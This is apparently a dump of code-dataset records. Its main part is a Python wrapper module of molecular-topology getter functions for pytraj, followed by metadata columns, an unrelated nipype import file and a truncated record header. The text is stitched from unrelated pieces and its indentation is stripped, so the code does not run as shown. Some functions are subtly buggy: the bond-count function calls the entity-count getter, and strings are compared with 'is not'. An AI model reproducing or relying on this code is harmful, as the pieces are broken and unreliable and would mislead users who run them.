def get_n_molecules_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_molecules_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_chains_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_chains_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_entities_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_entities_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_bonds_from_component (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_bonds_from_component as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
## molecule
def get_index_from_molecule (item, indices='all', frame_indices='all'):
return get_molecule_index_from_molecule (item, indices=indices, frame_indices=frame_indices)
def get_id_from_molecule (item, indices='all', frame_indices='all'):
return get_molecule_id_from_molecule (item, indices=indices, frame_indices=frame_indices)
def get_name_from_molecule (item, indices='all', frame_indices='all'):
return get_molecule_name_from_molecule (item, indices=indices, frame_indices=frame_indices)
def get_type_from_molecule (item, indices='all', frame_indices='all'):
return get_molecule_type_from_molecule (item, indices=indices, frame_indices=frame_indices)
def get_atom_index_from_molecule(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_index_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_id_from_molecule(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_id_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_name_from_molecule(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_name_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_type_from_molecule(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_type_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_index_from_molecule(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_index_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_id_from_molecule(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_id_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_name_from_molecule(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_name_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_type_from_molecule(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_type_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_name_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_name_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_index_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_index_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_id_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_id_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_type_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_type_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_name_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_name_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_index_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_index_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_id_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_id_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_type_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_type_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_index_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_index_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_id_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_id_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_name_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_name_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_type_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_type_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_index_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_index_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_id_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_id_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_name_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_name_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_type_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_type_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_atoms_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_atoms_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_groups_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_groups_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_components_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_components_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_molecules_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_molecules_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_chains_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_chains_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_entities_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_entities_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_bonds_from_molecule (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_bonds_from_molecule as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
## chain
def get_index_from_chain (item, indices='all', frame_indices='all'):
return get_chain_index_from_chain (item, indices=indices, frame_indices=frame_indices)
def get_id_from_chain (item, indices='all', frame_indices='all'):
return get_chain_id_from_chain (item, indices=indices, frame_indices=frame_indices)
def get_name_from_chain (item, indices='all', frame_indices='all'):
return get_chain_name_from_chain (item, indices=indices, frame_indices=frame_indices)
def get_type_from_chain (item, indices='all', frame_indices='all'):
return get_chain_type_from_chain (item, indices=indices, frame_indices=frame_indices)
def get_atom_index_from_chain(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_index_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_id_from_chain(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_id_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_name_from_chain(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_name_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_type_from_chain(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_type_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_index_from_chain(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_index_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_id_from_chain(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_id_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_name_from_chain(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_name_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_type_from_chain(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_type_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_name_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_name_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_index_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_index_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_id_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_id_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_type_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_type_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_name_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_name_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_index_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_index_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_id_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_id_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_type_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_type_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_index_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_index_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_id_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_id_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_name_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_name_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_type_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_type_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_index_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_index_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_id_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_id_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_name_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_name_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_type_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_type_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_atoms_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_atoms_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_groups_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_groups_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_components_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_components_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_molecules_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_molecules_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_chains_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_chains_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_entities_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_entities_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_bonds_from_chain (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_bonds_from_chain as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
## entity
def get_index_from_entity (item, indices='all', frame_indices='all'):
return get_entity_index_from_entity (item, indices=indices, frame_indices=frame_indices)
def get_id_from_entity (item, indices='all', frame_indices='all'):
return get_entity_id_from_entity (item, indices=indices, frame_indices=frame_indices)
def get_name_from_entity (item, indices='all', frame_indices='all'):
return get_entity_name_from_entity (item, indices=indices, frame_indices=frame_indices)
def get_type_from_entity (item, indices='all', frame_indices='all'):
return get_entity_type_from_entity (item, indices=indices, frame_indices=frame_indices)
def get_atom_index_from_entity(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_index_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_id_from_entity(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_id_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_name_from_entity(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_name_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_type_from_entity(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_type_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_index_from_entity(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_index_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_id_from_entity(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_id_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_name_from_entity(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_name_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_group_type_from_entity(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_group_type_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_name_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_name_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_index_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_index_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_id_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_id_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_component_type_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_component_type_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_name_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_name_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_index_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_index_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_id_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_id_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_chain_type_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_chain_type_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_index_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_index_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_id_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_id_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_name_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_name_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_molecule_type_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_molecule_type_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_index_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_index_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_id_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_id_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_name_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_name_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_entity_type_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_entity_type_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_atoms_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_atoms_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_groups_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_groups_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_components_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_components_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_molecules_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_molecules_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_chains_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_chains_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_entities_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_entities_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_bonds_from_entity (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_bonds_from_entity as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
## system
def get_bonded_atoms_from_system(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_bonded_atoms_from_system as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_atoms_from_system(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_atoms_from_system as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_groups_from_system(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_groups_from_system as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_components_from_system(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_components_from_system as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_chains_from_system(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_chains_from_system as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_molecules_from_system(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_molecules_from_system as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_entities_from_system(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_entities_from_system as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_bonds_from_system(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_entities_from_system as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_aminoacids_from_system (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_aminoacids_from_system as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_nucleotides_from_system (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_nucleotides_from_system as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_ions_from_system (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_ions_from_system as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_waters_from_system (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_waters_from_system as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_cosolutes_from_system (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_cosolutes_from_system as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_small_molecules_from_system (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_small_molecules_from_system as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_peptides_from_system (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_peptides_from_system as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_proteins_from_system (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_proteins_from_system as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_dnas_from_system (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_dnas_from_system as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_rnas_from_system (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_rnas_from_system as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_lipids_from_system (item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_lipids_from_system as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_coordinates_from_system(item, indices='all', frame_indices='all'):
tmp_item = item.xyz * 0.1 * unit.nanometers
if frame_indices is not 'all':
tmp_item = tmp_item[frame_indices,:,:]
return tmp_item
def get_box_from_system(item, indices='all', frame_indices='all'):
from molsysmt import box_vectors_from_box_lengths_and_angles
lengths = get_box_lengths_from_system(item, indices=indices, frame_indices=frame_indices)
angles = get_box_angles_from_system(item, indices=indices, frame_indices=frame_indices)
tmp_item = box_vectors_from_box_lengths_and_angles(lengths, angles)
return tmp_item
def get_box_shape_from_system(item, indices='all', frame_indices='all'):
from molsysmt import box_shape_from_box_angles
angles = get_box_angles_from_system(item, indices=indices, frame_indices=frame_indices)
tmp_item = box_shape_from_box_angles(angles)
return tmp_item
def get_box_lengths_from_system(item, indices='all', frame_indices='all'):
tmp_item = item.unitcells[:,0:3]*0.1*unit.nanometers
if frame_indices is not 'all':
tmp_item = tmp_item[frame_indices,:]
return tmp_item
def get_box_angles_from_system(item, indices='all', frame_indices='all'):
tmp_item = item.unitcells[:,3:6]*unit.degrees
if frame_indices is not 'all':
tmp_item = tmp_item[frame_indices,:]
return tmp_item
def get_time_from_system(item, indices='all', frame_indices='all'):
return item.time*unit.picoseconds
def get_step_from_system(item, indices='all', frame_indices='all'):
return None
def get_frame_from_system(item, indices='all', frame_indices='all'):
tmp_step = get_step_from_system(item, frame_indices=frame_indices)
tmp_time = get_time_from_system(item, frame_indices=frame_indices)
tmp_coordinates = get_coordinates_from_system(item, frame_indices=frame_indices)
tmp_box = get_box_from_system(item, frame_indices=frame_indices)
return tmp_step, tmp_time, tmp_coordinates, tmp_box
def get_n_frames_from_system(item, indices='all', frame_indices='all'):
return item.n_frames
def get_form_from_system(item, indices='all', frame_indices='all'):
return form_name
## bond
def get_index_from_bond(item, indices='all', frame_indices='all'):
return get_bond_index_from_bond(item, indices=indices)
def get_order_from_bond(item, indices='all', frame_indices='all'):
return get_bond_order_from_bond(item, indices=indices)
def get_type_from_bond(item, indices='all', frame_indices='all'):
return get_bond_type_from_bond(item, indices=indices)
def get_bond_index_from_bond(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_bond_index_from_bond as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_bond_order_from_bond(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_bond_order_from_bond as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_bond_type_from_bond(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_bond_type_from_bond as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_atom_index_from_bond(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_atom_index_from_bond as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
def get_n_bonds_from_bond(item, indices='all', frame_indices='all'):
from .api_pytraj_Topology import get_n_bonds_from_bond as _get
tmp_item = to_pytraj_Topology(item)
return _get(tmp_item, indices=indices)
###### Set
def set_box_to_system(item, indices='all', frame_indices='all', value=None):
raise NotImplementedError
def set_coordinates_to_system(item, indices='all', frame_indices='all', value=None):
raise NotImplementedError
| 38.528786 | 195 | 0.786613 | 9,409 | 61,569 | 4.686152 | 0.011585 | 0.120657 | 0.09707 | 0.132722 | 0.974871 | 0.969382 | 0.964347 | 0.952168 | 0.947111 | 0.93729 | 0 | 0.000205 | 0.129205 | 61,569 | 1,597 | 196 | 38.552912 | 0.822192 | 0.001007 | 0 | 0.460194 | 0 | 0 | 0.027067 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.258252 | false | 0 | 0.221359 | 0.032039 | 0.73301 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
3abc3c3bd1c6dbd02ddd0ed2ca79647e28cf559a | 463 | py | Python | nipype/interfaces/semtools/filtering/__init__.py | grlee77/nipype | 73f3a733ac1b7d9b09ec32a387905a9302423b87 | [
"BSD-3-Clause"
] | null | null | null | nipype/interfaces/semtools/filtering/__init__.py | grlee77/nipype | 73f3a733ac1b7d9b09ec32a387905a9302423b87 | [
"BSD-3-Clause"
] | null | null | null | nipype/interfaces/semtools/filtering/__init__.py | grlee77/nipype | 73f3a733ac1b7d9b09ec32a387905a9302423b87 | [
"BSD-3-Clause"
] | null | null | null | from denoising import UnbiasedNonLocalMeans
from featuredetection import GenerateSummedGradientImage, CannySegmentationLevelSetImageFilter, DilateImage, TextureFromNoiseImageFilter, FlippedDifference, ErodeImage, GenerateBrainClippedImage, NeighborhoodMedian, GenerateTestImage, NeighborhoodMean, HammerAttributeCreator, TextureMeasureFilter, DilateMask, DumpBinaryTrainingVectors, DistanceMaps, STAPLEAnalysis, GradientAnisotropicDiffusionImageFilter, CannyEdge
| 154.333333 | 418 | 0.909287 | 25 | 463 | 16.84 | 0.92 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.053996 | 463 | 2 | 419 | 231.5 | 0.961187 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
3ada3a153a8c763ccc9603f61d471e3a4525eef1 | 778 | py | Python | REST/python-refresher-master/36_the_at_syntax_for_decorators/code.py | Rebell-Leader/bg | 616a40286fe1d34db2916762c477676ed8067cdb | [
"Apache-2.0"
] | null | null | null | REST/python-refresher-master/36_the_at_syntax_for_decorators/code.py | Rebell-Leader/bg | 616a40286fe1d34db2916762c477676ed8067cdb | [
"Apache-2.0"
